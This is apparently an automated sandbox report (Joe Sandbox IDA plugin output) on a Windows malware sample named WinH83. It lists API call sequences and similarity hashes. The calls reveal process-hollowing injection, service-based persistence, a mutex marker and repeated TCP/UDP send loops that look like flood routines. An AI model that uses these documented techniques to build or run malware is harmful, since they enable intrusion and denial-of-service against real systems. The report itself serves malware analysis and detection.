        • Part of subcall function 00404F50: ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?), ref: 00405001
        • Part of subcall function 00404F50: VirtualQueryEx.KERNEL32(?,?,00000000,0000001C), ref: 00405014
      • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000000,00000040,?,00000000,00000000,00000000), ref: 004050DC
      • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?,?,?,00000000,00000000,00000000), ref: 0040518E
      • WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 004051A4
      • SetThreadContext.KERNEL32(?,00010007), ref: 004051E5
      • ResumeThread.KERNEL32(?), ref: 004051F0
      • CloseHandle.KERNEL32(?), ref: 00405201
      • CloseHandle.KERNEL32(?), ref: 00405208
      • TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00405222
      • CloseHandle.KERNEL32(?), ref: 00405233
      • CloseHandle.KERNEL32(?), ref: 0040523A
      • CloseHandle.KERNEL32(?), ref: 00405249
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: CloseHandleProcess$MemoryThread$ContextVirtualWrite$CreateProtectQueryReadResumeTerminate
      • String ID:
      • API String ID: 1172303993-0
      • Opcode ID: 623d831c4799a319580453fe82b860b5df37d76266bbcd616d2ff9953a9d5461
      • Instruction ID: 141aa6610cd99cb5175e9e9bd0261924da27ba30c832803be0871d0b99e0ff5c
      • Opcode Fuzzy Hash: 623d831c4799a319580453fe82b860b5df37d76266bbcd616d2ff9953a9d5461
      • Instruction Fuzzy Hash: 5D511AB1604306AFD714DF54D984E6BB7E8FBC8704F00492EF695A7280D734E9098FAA
      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
      • String ID:
      • API String ID: 801014965-0
      • Opcode ID: 3de23573ef1715b9a8928f26ab0e8641acaccc1afddd6fa0509801181ce18bb7
      • Instruction ID: 08c3d47bc78690a4692016e01a4053327b0450060358d7bde467d7ce67411583
      • Opcode Fuzzy Hash: 3de23573ef1715b9a8928f26ab0e8641acaccc1afddd6fa0509801181ce18bb7
      • Instruction Fuzzy Hash: 10415EB5840744DFDB20EFA5D945AAA7BB8FB09720F20453BE942B7292C7385850CF59
      APIs
      • htons.WS2_32 ref: 00403A5B
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000000), ref: 00403A8A
      • connect.WS2_32(00000000,?,00000010), ref: 00403A9A
      • sprintf.MSVCRT ref: 00403B0F
      • send.WS2_32(00000000,?,?,00000000), ref: 00403B2F
      • Sleep.KERNEL32(?,?,00000000), ref: 00403B41
      • closesocket.WS2_32(00000000), ref: 00403B55
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • closesocket.WS2_32(00000000), ref: 00403B7B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: closesocket$CountSleepTickconnectgethostbynamehtonsinet_addrrandsendsocketsprintfsrand
      • String ID: #%d<<<<<I@C<<<<<%s!
      • API String ID: 2412321289-2252867878
      • Opcode ID: d2661d546bbe370dccfce10274fdb1bc706107758e247911a729c7ef5c8e7780
      • Instruction ID: 757bc92c44c000d424731bf525e197106d9849695528a586ad82f3115cc63796
      • Opcode Fuzzy Hash: d2661d546bbe370dccfce10274fdb1bc706107758e247911a729c7ef5c8e7780
      • Instruction Fuzzy Hash: 61312C717003005BE3109F68DD45BAB77D8EB84711F000A3EF556F62D2DBB9DA5487AA
      APIs
      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00401100
      • Sleep.KERNEL32(00000001), ref: 0040111A
      • GetProcAddress.KERNEL32(00000000,CreateProcessInternalA), ref: 00401122
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressLibraryLoadProcSleep
      • String ID: CreateProcessInternalA$kernel32.dll
      • API String ID: 188063004-3660314680
      • Opcode ID: c94f652345d368492b510be50749c763d3809195a6ab1b817fa2ed5e1467b805
      • Instruction ID: 17414ca3e7859be5678fcf000ff8f36a898fc3596c14bf2c8eff9706db6db05c
      • Opcode Fuzzy Hash: c94f652345d368492b510be50749c763d3809195a6ab1b817fa2ed5e1467b805
      • Instruction Fuzzy Hash: 9911E731680318BBE720EF94DD0AFDE7B78DB85711F1041A6FE09BA2C0D6B469548BE5
      APIs
      • CreateMutexA.KERNEL32(00000000,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,?,00000000), ref: 00402323
      • GetLastError.KERNEL32(?,00000000), ref: 0040232B
      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402339
      • WSAStartup.WS2_32(00000202,?), ref: 00402354
      • CreateThread.KERNEL32(00000000,00000000,004023A0,00000000,00000000,00000000), ref: 0040237B
      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00402382
      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402385
      • Sleep.KERNEL32(00002710,?,00000000), ref: 0040238C
      Strings
      • O5WGU2RYGMXDGMZSGIXG64THHI4DG===, xrefs: 0040231A
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===
      • API String ID: 3243752880-1710454822
      • Opcode ID: 40503449b649fef1bd0270346f8e5b0dffe0f7ca521dd074fbf107b19bcd37d6
      • Instruction ID: f0887902d8799ec79f41d18c9017bde5b9cb0edae3060649d4a43c805d283ee9
      • Opcode Fuzzy Hash: 40503449b649fef1bd0270346f8e5b0dffe0f7ca521dd074fbf107b19bcd37d6
      • Instruction Fuzzy Hash: C1F062312C4320BBF220A760AE0EF9A3798EB45761F620132FB16B61D086BD6925856D
      APIs
      • RegisterServiceCtrlHandlerA.ADVAPI32(WinH83,004020E0), ref: 00401FBE
      • SetServiceStatus.ADVAPI32(00000000,00409B00), ref: 00401FE5
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040204E
      • ExitProcess.KERNEL32 ref: 0040208D
        • Part of subcall function 00401030: GetSystemDirectoryA.KERNEL32(?,00000040), ref: 0040103F
      • GetCurrentProcess.KERNEL32(00004000,?,?,?), ref: 0040209D
      • SetPriorityClass.KERNEL32(00000000), ref: 004020A4
        • Part of subcall function 00402310: CreateMutexA.KERNEL32(00000000,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,?,00000000), ref: 00402323
        • Part of subcall function 00402310: GetLastError.KERNEL32(?,00000000), ref: 0040232B
        • Part of subcall function 00402310: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402339
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: ProcessService$ClassCloseCreateCtrlCurrentDirectoryErrorExitFileHandleHandlerLastModuleMutexNamePriorityRegisterStatusSystem
      • String ID: WinH83
      • API String ID: 1658639894-961809781
      • Opcode ID: 4ee55938119c28e4f73666206572570f15b1761e54eab9b4a49128cb3a0eb2af
      • Instruction ID: 9642478b6596cb6bc20c0ea93c2b3dc97e5bca214b4293dff6f279fa1b332622
      • Opcode Fuzzy Hash: 4ee55938119c28e4f73666206572570f15b1761e54eab9b4a49128cb3a0eb2af
      • Instruction Fuzzy Hash: D8318DB1544340ABD310EF10EE49B9A77B8BB84B24F00493EF255B21E1C7B85944CFAA
      APIs
      • CloseHandle.KERNEL32(?), ref: 00401AB9
      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00401AC5
      • OpenServiceA.ADVAPI32(00000000,PCIDump,00010020), ref: 00401ADE
      • ControlService.ADVAPI32(00000000,00000001,?), ref: 00401AF8
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401AFF
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401B02
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Service$CloseHandle$Open$ControlManager
      • String ID: PCIDump
      • API String ID: 221034970-2760668468
      • Opcode ID: d3f51e32179601bd6bd385f92349c8e65cf1fd802eb3f5bc66244932cf849bfe
      • Instruction ID: ad2f3aa41601f700f468a5a7830ac414b64389455abcdf9db4cbc2565e09f406
      • Opcode Fuzzy Hash: d3f51e32179601bd6bd385f92349c8e65cf1fd802eb3f5bc66244932cf849bfe
      • Instruction Fuzzy Hash: 48F0E2326813107BE122EB289D8AF6F7A38EF88B51F010024FA0672291DB74981186A9
      APIs
      • WSAStartup.WS2_32(00000202,?), ref: 00403453
      • WSASocketA.WS2_32 ref: 0040346D
      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 004034A0
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: SocketStartupsetsockopt
      • String ID:
      • API String ID: 3631403553-0
      • Opcode ID: e1dcf5baf38bc8b48eae98141d4a7c83cceea2be991cffbceb56b85ab6e853a1
      • Instruction ID: 226e03a2150bb59f1e7f6b3c1f6d9c6eb840beed862f8ec42d854958baf2facb
      • Opcode Fuzzy Hash: e1dcf5baf38bc8b48eae98141d4a7c83cceea2be991cffbceb56b85ab6e853a1
      • Instruction Fuzzy Hash: 6241D8716443006AE3109F64DC45B5BB7E8EF8C724F00493EFA45FB2D1E6759A04875A
      APIs
      • htons.WS2_32 ref: 00403737
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 00403770
      • connect.WS2_32(00000000,?,00000010), ref: 0040377C
      • setsockopt.WS2_32 ref: 0040379C
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • send.WS2_32(00000000,?,00000000,00000000), ref: 004037E1
      • Sleep.KERNEL32(?), ref: 004037FC
      • closesocket.WS2_32(00000000), ref: 0040380C
      • Sleep.KERNEL32(?), ref: 00403818
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$CountTickclosesocketconnectgethostbynamehtonsinet_addrrandsendsetsockoptsocketsrand
      • String ID:
      • API String ID: 526411511-0
      • Opcode ID: 444a2075ad8941576596289908408714f768e301d8c063e47ccbfb94edac868b
      • Instruction ID: 392376a69a85ddd6a41fefe85f27db82272ddffc380eaf5d6d57f244aef9ba4d
      • Opcode Fuzzy Hash: 444a2075ad8941576596289908408714f768e301d8c063e47ccbfb94edac868b
      • Instruction Fuzzy Hash: 7D31C8B17403416BE7009B65DD46FAB77E8EB88700F00843DF645EB3D1E6B8D9148B6A
      APIs
      • htons.WS2_32 ref: 00403BC7
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403C06
      • connect.WS2_32(00000000,?,00000010), ref: 00403C16
      • closesocket.WS2_32(00000000), ref: 00403C22
      • send.WS2_32(00000000,?,00000000), ref: 00403C6A
      • Sleep.KERNEL32(?,?,00000000), ref: 00403C77
      • closesocket.WS2_32(00000000), ref: 00403C80
      • Sleep.KERNEL32(?,?,00000000), ref: 00403C8D
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepclosesocket$connectgethostbynamehtonsinet_addrsendsocket
      • String ID:
      • API String ID: 1592164743-0
      • Opcode ID: 6338840cde0a2a7df0f9744fb7fc18c33f45636636b2eddbddb7982ae8ac7723
      • Instruction ID: 54006a430e523e054915d6eeed30a28e789cf4b120cc542b5afca5d7f0e37e33
      • Opcode Fuzzy Hash: 6338840cde0a2a7df0f9744fb7fc18c33f45636636b2eddbddb7982ae8ac7723
      • Instruction Fuzzy Hash: C92128716043006BE3009F25ED41B6B77E8EB88710F004939F655FB2E2D679DA50CB9D
      APIs
      • htons.WS2_32 ref: 00404608
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 0040463F
      • connect.WS2_32(00000000,?,00000010), ref: 0040464F
      • send.WS2_32(00000000,00408A7C,00000000,00000000), ref: 0040466A
      • Sleep.KERNEL32(?), ref: 00404678
      • closesocket.WS2_32(00000000), ref: 00404681
      • Sleep.KERNEL32(0000001E), ref: 00404689
      • closesocket.WS2_32(00000000), ref: 004046A1
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepclosesocket$connectgethostbynamehtonsinet_addrsendsocket
      • String ID:
      • API String ID: 1592164743-0
      • Opcode ID: 5eebb4bd4fb58d615f5178da3257558304f254ebf4d24a63fe7bd5c24358b5b7
      • Instruction ID: 52552667529c1c02b845fd8a5a2af135eee2e5d9a0b5595cc109e900984e1983
      • Opcode Fuzzy Hash: 5eebb4bd4fb58d615f5178da3257558304f254ebf4d24a63fe7bd5c24358b5b7
      • Instruction Fuzzy Hash: EB21C9712003005BE300DF79AD45B6B77D8EF85320F00493AF655E62E2E779D9558BAD
      APIs
      • htons.WS2_32(?), ref: 004035FB
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 00403634
      • setsockopt.WS2_32 ref: 00403652
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • sendto.WS2_32(00000000,?,00000000,00000000,?,00000010), ref: 004036A1
      • Sleep.KERNEL32(?), ref: 004036BC
      • closesocket.WS2_32(00000000), ref: 004036CC
      • Sleep.KERNEL32(?), ref: 004036D8
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$CountTickclosesocketgethostbynamehtonsinet_addrrandsendtosetsockoptsocketsrand
      • String ID:
      • API String ID: 1041160085-0
      • Opcode ID: 8a1cc530a81bfc68c490b0e3cc263bfa586558bb8acf8600ee6311d4aa21e5e8
      • Instruction ID: 989c941252648da03f0e755ab53e95e2a6e75eaf6f0a8efd28d51292b3b26e67
      • Opcode Fuzzy Hash: 8a1cc530a81bfc68c490b0e3cc263bfa586558bb8acf8600ee6311d4aa21e5e8
      • Instruction Fuzzy Hash: E131D6717003417BE710DB65DD45BAB76D8EB88700F00883DB685EB3D1E6B989108B5E
      APIs
      • LoadLibraryA.KERNEL32(Shell32.dll), ref: 00401646
      • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 00401654
      • FreeLibrary.KERNEL32(00000000), ref: 0040166F
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: Shell32.dll$ShellExecuteA$open
      • API String ID: 145871493-1242875128
      • Opcode ID: 2e57850eee62508e1949f66f631c0d0079fe20c14937c4a69f495ebaaf87453f
      • Instruction ID: 18a04fa1837e6b3da508e0e8e43fba5aac3cedb90d2bc1d2a056c299085bb5dc
      • Opcode Fuzzy Hash: 2e57850eee62508e1949f66f631c0d0079fe20c14937c4a69f495ebaaf87453f
      • Instruction Fuzzy Hash: F2D05E306C9310BBE1207F50AD0EFAF2A54DB46B01F120021FA02792D0D6B8280085BE
      APIs
      • CreateFileA.KERNEL32 ref: 00405297
      • GetFileSize.KERNEL32(00000000,00000000,?,00000000), ref: 004052AE
      • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 004052B7
      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?), ref: 004052E2
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00405304
      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?), ref: 0040530B
        • Part of subcall function 00405330: VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405399
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: File$??2@??3@CloseCreateFreeHandleReadSizeVirtual
      • String ID:
      • API String ID: 3988611374-0
      • Opcode ID: a2863e5673767d964cdede91afb04663b137781032fa7f0b81609b3cc9fc33b2
      • Instruction ID: 221b0b0a4cabf3d12b7df73f085c741e3f61b684f79064255cb0f96ed6264dd2
      • Opcode Fuzzy Hash: a2863e5673767d964cdede91afb04663b137781032fa7f0b81609b3cc9fc33b2
      • Instruction Fuzzy Hash: 111104712546046FE210AB24AC09F3B36DDEBC4764F00073DFE0AA73C0DAB5AD188679
      APIs
      • htons.WS2_32 ref: 004046E4
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 0040471F
      • sendto.WS2_32(00000000,00408A7C,00000000,00000000,?,00000010), ref: 00404741
      • Sleep.KERNEL32(?), ref: 0040474A
      • closesocket.WS2_32(00000000), ref: 00404750
      • Sleep.KERNEL32(0000001E), ref: 00404758
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$closesocketgethostbynamehtonsinet_addrsendtosocket
      • String ID:
      • API String ID: 1054369574-0
      • Opcode ID: 45a6ffd880468f70a481824dd6e3fd1755ad39f1b29a83d52c11540c06d7a3de
      • Instruction ID: bc9cb3a44a504bb613548d5f4e1e64a46e4bff955eaf8bddd84f51c244c6a70d
      • Opcode Fuzzy Hash: 45a6ffd880468f70a481824dd6e3fd1755ad39f1b29a83d52c11540c06d7a3de
      • Instruction Fuzzy Hash: 5D1160716403016BD700EB79AD45F5B77E4EB88710F40883AF645E72A2E774D814CB5D
      APIs
      • htons.WS2_32 ref: 00403CE4
